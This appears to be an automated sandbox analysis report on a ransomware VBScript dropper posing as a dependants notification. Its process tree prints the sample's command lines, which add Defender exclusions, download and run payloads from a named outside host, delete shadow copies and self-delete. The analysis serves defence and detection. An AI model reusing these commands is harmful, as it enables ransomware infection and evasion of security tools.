Edit tour
Windows
Analysis Report
NOTIFICATION_OF_DEPENDANTS.vbs
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Delete shadow copy via WMIC
VBScript performs obfuscated calls to suspicious functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Deletes shadow drive data (may be related to ransomware)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
May encrypt documents and pictures (Ransomware)
Modifies existing user documents (likely ransomware behavior)
Overwrites Mozilla Firefox settings
Powershell drops PE file
Sigma detected: Control Panel Items
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation STDIN+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities
Sigma detected: Suspicious Ping/Del Command Combination
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Command Line Path Traversal Evasion Attempt
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses insecure TLS / SSL version for HTTPS connection
Classification
- System is w10x64
- wscript.exe (PID: 6760 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\NOTIF ICATION_OF _DEPENDANT S.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 6844 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell start- process ht tps://www. oldmutual. co.za/v3/a ssets/blt0 554f48052b b4620/blt8 b52803ba23 b252a/6674 2ed3b2cbc1 4f42b4434c /Superfund _Beneficia ry_Nominat ion_form.p df MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6852 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6896 cmdline:
powershell start-pro cess https ://www.old mutual.co. za/v3/asse ts/blt0554 f48052bb46 20/blt8b52 803ba23b25 2a/66742ed 3b2cbc14f4 2b4434c/Su perfund_Be neficiary_ Nomination _form.pdf MD5: 04029E121A0CFA5991749937DD22A1D9) - chrome.exe (PID: 7092 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t https:// www.oldmut ual.co.za/ v3/assets/ blt0554f48 052bb4620/ blt8b52803 ba23b252a/ 66742ed3b2 cbc14f42b4 434c/Super fund_Benef iciary_Nom ination_fo rm.pdf MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA) - chrome.exe (PID: 2856 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2080 --fi eld-trial- handle=201 2,i,175152 0470238867 524,110350 1231099164 718,262144 --disable -features= Optimizati onGuideMod elDownload ing,Optimi zationHint s,Optimiza tionHintsF etching,Op timization TargetPred iction /pr efetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA) - cmd.exe (PID: 7152 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell -input format non e -outputf ormat none -NonInter active -Co mmand Add- MpPreferen ce -Exclus ionPath $e nv:tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7160 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6356 cmdline:
powershell -inputfor mat none - outputform at none -N onInteract ive -Comma nd Add-MpP reference -Exclusion Path $env: tmp MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 7752 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell Invoke -WebReques t -Uri htt ps://kilto ne.top/ste lin/rwcla. cpl -Outfi le $env:tm p\\fjeljie s.cpl MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7776 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7856 cmdline:
powershell Invoke-We bRequest - Uri https: //kiltone. top/stelin /rwcla.cpl -Outfile $env:tmp\\ fjeljies.c pl MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 7008 cmdline:
"C:\Window s\System32 \cmd.exe" /c control C:\Users\ user\AppDa ta\Local\T emp/fjelji es.cpl MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5732 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - control.exe (PID: 7608 cmdline:
control C: \Users\use r\AppData\ Local\Temp /fjeljies. cpl MD5: 11C18DBF352D81C9532A8EF442151CB1) - rundll32.exe (PID: 4716 cmdline:
"C:\Window s\system32 \rundll32. exe" Shell 32.dll,Con trol_RunDL L C:\Users \user\AppD ata\Local\ Temp/fjelj ies.cpl MD5: EF3179D498793BF4234F708D3BE28633) - rundll32.exe (PID: 8084 cmdline:
"C:\Window s\SysWOW64 \rundll32. exe" "C:\W indows\Sys WOW64\shel l32.dll",# 44 C:\User s\user\App Data\Local \Temp/fjel jies.cpl MD5: 889B99C52A60DD49227C5E485A016679) - cmd.exe (PID: 7520 cmdline:
cmd /c pow ershell -i nputformat none -out putformat none -NonI nteractive -Command Add-MpPref erence -Ex clusionPat h "$env:tm p" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 2376 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5592 cmdline:
powershell -inputfor mat none - outputform at none -N onInteract ive -Comma nd Add-MpP reference -Exclusion Path "$env :tmp" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - cmd.exe (PID: 7032 cmdline:
cmd /c pow ershell In voke-WebRe quest -Uri https://k iltone.top /stelin/Go sjeufon.cp l -Outfile $env:tmp\ eryy65ty.e xe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6868 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7216 cmdline:
powershell Invoke-We bRequest - Uri https: //kiltone. top/stelin /Gosjeufon .cpl -Outf ile $env:t mp\eryy65t y.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - cmd.exe (PID: 7776 cmdline:
cmd /c %te mp%/eryy65 ty.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 1876 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - eryy65ty.exe (PID: 8180 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp/eryy65t y.exe MD5: 9049FABA5517305C44BD5F28398FB6B9) - WMIC.exe (PID: 6952 cmdline:
c:\IgQfcH\ IgQf\..\.. \Windows\I gQf\IgQf\. .\..\syste m32\IgQf\I gQf\..\..\ wbem\IgQf\ IgQfc\..\. .\wmic.exe shadowcop y delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - conhost.exe (PID: 7284 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WMIC.exe (PID: 7868 cmdline:
c:\ONkVQK\ ONkV\..\.. \Windows\O NkV\ONkV\. .\..\syste m32\ONkV\O NkV\..\..\ wbem\ONkV\ ONkVQ\..\. .\wmic.exe shadowcop y delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - conhost.exe (PID: 2224 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 1192 cmdline:
cmd.exe /C ping 1.1. 1.1 -n 1 - w 3000 > N ul & Del / f /q "C:\U sers\user\ AppData\Lo cal\Temp\e ryy65ty.ex e" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5424 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - PING.EXE (PID: 7800 cmdline:
ping 1.1.1 .1 -n 1 -w 3000 MD5: B3624DD758CCECF93A1226CEF252CA12)
- svchost.exe (PID: 6424 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- eryy65ty.exe (PID: 8052 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\eryy65 ty.exe" MD5: 9049FABA5517305C44BD5F28398FB6B9) - WMIC.exe (PID: 7120 cmdline:
c:\HdMVWr\ HdMV\..\.. \Windows\H dMV\HdMV\. .\..\syste m32\HdMV\H dMV\..\..\ wbem\HdMV\ HdMVW\..\. .\wmic.exe shadowcop y delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - conhost.exe (PID: 6960 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WMIC.exe (PID: 6420 cmdline:
c:\MqHRzl\ MqHR\..\.. \Windows\M qHR\MqHR\. .\..\syste m32\MqHR\M qHR\..\..\ wbem\MqHR\ MqHRz\..\. .\wmic.exe shadowcop y delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - conhost.exe (PID: 6364 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 6388 cmdline:
cmd.exe /C ping 1.1. 1.1 -n 1 - w 3000 > N ul & Del / f /q "C:\U sers\user\ AppData\Lo cal\Temp\e ryy65ty.ex e" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 8164 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - PING.EXE (PID: 4132 cmdline:
ping 1.1.1 .1 -n 1 -w 3000 MD5: B3624DD758CCECF93A1226CEF252CA12)
- eryy65ty.exe (PID: 7040 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\eryy65 ty.exe" MD5: 9049FABA5517305C44BD5F28398FB6B9) - WMIC.exe (PID: 6200 cmdline:
c:\ihzCRF\ ihzC\..\.. \Windows\i hzC\ihzC\. .\..\syste m32\ihzC\i hzC\..\..\ wbem\ihzC\ ihzCR\..\. .\wmic.exe shadowcop y delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - conhost.exe (PID: 6204 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WMIC.exe (PID: 4444 cmdline:
c:\sZJidg\ sZJi\..\.. \Windows\s ZJi\sZJi\. .\..\syste m32\sZJi\s ZJi\..\..\ wbem\sZJi\ sZJid\..\. .\wmic.exe shadowcop y delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - conhost.exe (PID: 2056 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 5612 cmdline:
cmd.exe /C ping 1.1. 1.1 -n 1 - w 3000 > N ul & Del / f /q "C:\U sers\user\ AppData\Lo cal\Temp\e ryy65ty.ex e" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 660 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - PING.EXE (PID: 6000 cmdline:
ping 1.1.1 .1 -n 1 -w 3000 MD5: B3624DD758CCECF93A1226CEF252CA12)
- notepad.exe (PID: 6236 cmdline:
"C:\Window s\system32 \NOTEPAD.E XE" C:\Use rs\user\Ap pData\Roam ing\Micros oft\Window s\Start Me nu\Program s\Startup\ Decryptfil es.txt MD5: 27F71B12CB585541885A31BE22F61C83)
- cleanup
⊘No configs have been found
⊘No yara matches
Operating System Destruction |
---|
Source: | Author: Joe Security: |
System Summary |
---|
Source: | Author: Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_): |
Source: | Author: Jonathan Cheong, oscd.community: |
Source: | Author: Jonathan Cheong, oscd.community: |
Source: | Author: Jonathan Cheong, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades): |
Source: | Author: Ilya Krestinichev: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: Christian Burkard (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: vburov: |
⊘No Suricata rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | Virustotal: | Perma Link |
Source: | ReversingLabs: | ||
Source: | ReversingLabs: |
Source: | Virustotal: | Perma Link |
Source: | Integrated Neural Analysis Model: |
Source: | Joe Sandbox ML: |
Source: | HTTP Parser: | ||
Source: | HTTP Parser: | ||
Source: | HTTP Parser: |
Source: | HTTPS traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: |
Software Vulnerabilities |
---|
Source: | Child: |
Source: | Memory has grown: |
Networking |
---|
Source: | Process created: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | JA3 fingerprint: | ||
Source: | JA3 fingerprint: |
Source: | HTTPS traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |